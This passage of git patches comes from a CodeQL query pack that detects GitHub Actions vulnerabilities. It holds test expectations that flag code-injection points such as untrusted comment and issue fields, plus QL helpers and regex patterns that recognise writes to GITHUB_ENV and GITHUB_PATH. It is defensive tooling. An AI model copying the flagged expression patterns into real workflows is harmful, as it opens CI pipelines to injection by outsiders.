Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 313acfcac20a34cee1c078c7534e564e6ac3da71 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 12:28:06 +0200 Subject: [PATCH 0301/1267] Add externally triggereable data model and predicates --- ql/lib/codeql/actions/Ast.qll | 2 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++++ ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 9 +++++++++ .../internal/ExternalFlowExtensions.qll | 7 ++++++- ql/lib/ext/workflow-models/workflow-models.yml | 17 ++++++++++++++++- 5 files changed, 38 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1e57c8f3d29..cab2fc05ac5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -348,6 +348,8 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0370b1ca4c3..46bbcaaf29e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -703,6 +703,11 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + /** Holds if the job can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + } + /** Holds if the job is privileged. */ predicate isPrivileged() { // the job has privileged runtime permissions diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index a52cc427d35..c46a3ee64a1 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -38,6 +38,15 @@ predicate contextTriggerDataModel(string trigger, string context_prefix) { Extensions::contextTriggerDataModel(trigger, context_prefix) } +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 415c02dc1ba..6c64b72e6b4 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -36,6 +36,11 @@ extensible predicate workflowDataModel( extensible predicate repositoryDataModel(string visibility, string default_branch_name); /** - * Holds if context/trigger mapping exists for the given parameters. + * Holds if a context expression starting with context_prefix is available for a given trigger. */ extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 404e894a5f8..ff02589fb84 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -11,7 +11,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: contextTriggerDataModel data: - # This predicate maps triggering events with the github event context available for that event - ["commit_comment", "github.event.comment"] - ["discussion", "github.event.discussion"] - ["discussion_comment", "github.event.comment"] @@ -55,3 +54,19 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["issue_comment"] + - ["issues"] + - ["pull_request"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on trigger workflow + - ["workflow_call"] # depending on caller From 5d32071adcacbfeb2ce7b1c1f264f34266ec9f55 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 21 May 2024 23:02:34 +0200 Subject: [PATCH 0302/1267] resolve conflicts --- ql/lib/codeql/actions/Ast.qll | 164 +------------- ql/lib/codeql/actions/Helper.qll | 209 ++++++++++++++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 134 +++++++---- .../actions/controlflow/internal/Cfg.qll | 25 ++- .../codeql/actions/dataflow/FlowSources.qll | 54 ++--- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 14 +- .../dataflow/internal/DataFlowPrivate.qll | 19 +- .../dataflow/internal/DataFlowPublic.qll | 3 +- .../security/EnvPathInjectionQuery.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 4 +- .../actions/security/PoisonableSteps.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- ql/src/Debug/partial.ql | 2 +- ...jection.ql => EnvPathInjectionCritical.ql} | 15 +- ...Injection.ql => EnvPathInjectionMedium.ql} | 11 +- ...njection.ql => EnvVarInjectionCritical.ql} | 13 +- ...rInjection.ql => EnvVarInjectionMedium.ql} | 11 +- ...jection.ql => CommandInjectionCritical.ql} | 17 +- ...Injection.ql => CommandInjectionMedium.ql} | 10 +- ...eInjection.ql => CodeInjectionCritical.ql} | 15 +- ...odeInjection.ql => CodeInjectionMedium.ql} | 12 +- ql/src/Security/CWE-349/CachePoisoning.ql | 12 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 4 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 + ...soning.ql => ArtifactPoisoningCritical.ql} | 15 +- ...oisoning.ql => ArtifactPoisoningMedium.ql} | 10 +- ...itical.ql => UntrustedCheckoutCritical.ql} | 10 +- ...eckoutHigh.ql => UntrustedCheckoutHigh.ql} | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 31 +++ ql/test/library-tests/test.ql | 8 +- .../Security/CWE-077/EnvPathInjection.qlref | 1 - ...cted => EnvPathInjectionCritical.expected} | 10 +- .../CWE-077/EnvPathInjectionCritical.qlref | 1 + ...pected => EnvPathInjectionMedium.expected} | 0 .../CWE-077/EnvPathInjectionMedium.qlref | 1 + .../Security/CWE-077/EnvVarInjection.qlref | 1 - ...ected => EnvVarInjectionCritical.expected} | 22 +- .../CWE-077/EnvVarInjectionCritical.qlref | 1 + ...xpected => EnvVarInjectionMedium.expected} | 0 .../CWE-077/EnvVarInjectionMedium.qlref | 1 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 - .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 - .../Security/CWE-078/CommandInjection.qlref | 1 - ...cted => CommandInjectionCritical.expected} | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 1 + ...pected => CommandInjectionMedium.expected} | 0 .../CWE-078/CommandInjectionMedium.qlref | 1 + .../CWE-078/PrivilegedCommandInjection.qlref | 1 - .../.github/actions/action1/action.yml | 7 + .../{ => .github/actions}/action2/action.yml | 0 .../.github/actions/action3/action.yml | 9 + .../.github/actions/action4/action.yml | 7 + .../.github/actions/action5/action.yml | 26 +++ .../.github/workflows/changelog_required.yml | 9 - .../workflows/changelog_required_prt.yml | 9 - .../workflows/composite-action-caller-1.yml | 10 + .../workflows/composite-action-caller-2.yml | 10 + .../workflows/composite-action-caller-3.yml | 14 ++ ...{changelog.yml => reusable-workflow-1.yml} | 17 +- ...g_from_prt.yml => reusable-workflow-2.yml} | 17 +- .../workflows/reusable-workflow-caller-1.yml | 11 + .../workflows/reusable-workflow-caller-2.yml | 10 + .../Security/CWE-094/CodeInjection.qlref | 1 - ...xpected => CodeInjectionCritical.expected} | 191 ++++++++-------- .../CWE-094/CodeInjectionCritical.qlref | 1 + ....expected => CodeInjectionMedium.expected} | 43 +++- .../CWE-094/CodeInjectionMedium.qlref | 1 + .../CWE-094/PrivilegedCodeInjection.qlref | 1 - .../CWE-367/.github/workflows/actor.yml | 21 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 - ...ted => ArtifactPoisoningCritical.expected} | 26 +-- .../CWE-829/ArtifactPoisoningCritical.qlref | 2 + ...ected => ArtifactPoisoningMedium.expected} | 0 .../CWE-829/ArtifactPoisoningMedium.qlref | 2 + .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 - .../PrivilegedUntrustedCheckoutCritical.qlref | 1 - .../PrivilegedUntrustedCheckoutHigh.qlref | 1 - ...ted => UntrustedCheckoutCritical.expected} | 0 .../CWE-829/UntrustedCheckoutCritical.qlref | 1 + ...xpected => UntrustedCheckoutHigh.expected} | 0 .../CWE-829/UntrustedCheckoutHigh.qlref | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 0 .../CWE-829/UntrustedCheckoutMedium.qlref | 1 + 84 files changed, 812 insertions(+), 544 deletions(-) create mode 100644 ql/lib/codeql/actions/Helper.qll rename ql/src/Security/CWE-077/{PrivilegedEnvPathInjection.ql => EnvPathInjectionCritical.ql} (74%) rename ql/src/Security/CWE-077/{EnvPathInjection.ql => EnvPathInjectionMedium.ql} (78%) rename ql/src/Security/CWE-077/{PrivilegedEnvVarInjection.ql => EnvVarInjectionCritical.ql} (77%) rename ql/src/Security/CWE-077/{EnvVarInjection.ql => EnvVarInjectionMedium.ql} (80%) rename ql/src/Security/CWE-078/{PrivilegedCommandInjection.ql => CommandInjectionCritical.ql} (59%) rename ql/src/Security/CWE-078/{CommandInjection.ql => CommandInjectionMedium.ql} (79%) rename ql/src/Security/CWE-094/{PrivilegedCodeInjection.ql => CodeInjectionCritical.ql} (68%) rename ql/src/Security/CWE-094/{CodeInjection.ql => CodeInjectionMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedArtifactPoisoning.ql => ArtifactPoisoningCritical.ql} (64%) rename ql/src/Security/CWE-829/{ArtifactPoisoning.ql => ArtifactPoisoningMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.ql => UntrustedCheckoutCritical.ql} (85%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.ql => UntrustedCheckoutHigh.ql} (87%) create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvPathInjection.expected => EnvPathInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.expected => EnvPathInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvVarInjection.expected => EnvVarInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-077/{EnvVarInjection.expected => EnvVarInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref rename ql/test/query-tests/Security/CWE-078/{PrivilegedCommandInjection.expected => CommandInjectionCritical.expected} (61%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-078/{CommandInjection.expected => CommandInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml rename ql/test/query-tests/Security/CWE-094/{ => .github/actions}/action2/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog.yml => reusable-workflow-1.yml} (90%) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog_from_prt.yml => reusable-workflow-2.yml} (90%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref rename ql/test/query-tests/Security/CWE-094/{PrivilegedCodeInjection.expected => CodeInjectionCritical.expected} (65%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-094/{CodeInjection.expected => CodeInjectionMedium.expected} (74%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml delete mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedArtifactPoisoning.expected => ArtifactPoisoningCritical.expected} (73%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref rename ql/test/query-tests/Security/CWE-829/{ArtifactPoisoning.expected => ArtifactPoisoningMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.expected => UntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.expected => UntrustedCheckoutHigh.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cab2fc05ac5..9be2580f36e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,160 +1,6 @@ private import codeql.actions.ast.internal.Ast private import codeql.Locations - -module Utils { - bindingset[expr] - string normalizeExpr(string expr) { - result = - expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") - .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") - .regexpReplaceAll("\\s*\\.\\s*", ".") - } - - bindingset[regex] - string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] - } - - bindingset[str] - private string trimQuotes(string str) { - result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") - } - - bindingset[line, var] - predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 0)) and - value = trimQuotes(assignment.splitAt("=", 1)) - or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) - ) - } - - bindingset[var] - private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - // echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" - } - - bindingset[script, var] - predicate extractMultilineAssignment(string script, string var, string key, string value) { - // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) - ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) - ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) - ) - } - - bindingset[line] - predicate extractPathAssignment(string line, string value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) - ) - } - - predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) - } - - predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) - } - - predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) - } -} +import codeql.actions.Helper class AstNode instanceof AstNodeImpl { AstNode getAChildNode() { result = super.getAChildNode() } @@ -193,7 +39,7 @@ class Expression extends AstNode instanceof ExpressionImpl { string getRawExpression() { result = rawExpression } - string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } + string getNormalizedExpression() { result = normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ @@ -227,6 +73,10 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + LocalJob getACaller() { result = super.getACaller() } + + predicate isPrivileged() { super.isPrivileged() } } /** @@ -273,6 +123,8 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + ExternalJob getACaller() { result = super.getACaller() } } class Input extends AstNode instanceof InputImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll new file mode 100644 index 00000000000..416cb97c8d0 --- /dev/null +++ b/ql/lib/codeql/actions/Helper.qll @@ -0,0 +1,209 @@ +private import codeql.actions.Ast +private import codeql.Locations + +bindingset[expr] +string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") + .regexpReplaceAll("\\s*\\.\\s*", ".") +} + +bindingset[regex] +string wrapRegexp(string regex) { + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] +} + +bindingset[str] +private string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") +} + +bindingset[line, var] +predicate extractLineAssignment(string line, string var, string key, string value) { + exists(string assignment | + // single line assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) + or + // workflow command assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value = trimQuotes(assignment.splitAt("::", 1)) + ) +} + +bindingset[var] +private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV + result = + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" + result = + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +} + +bindingset[script, var] +predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) + ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) + ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = 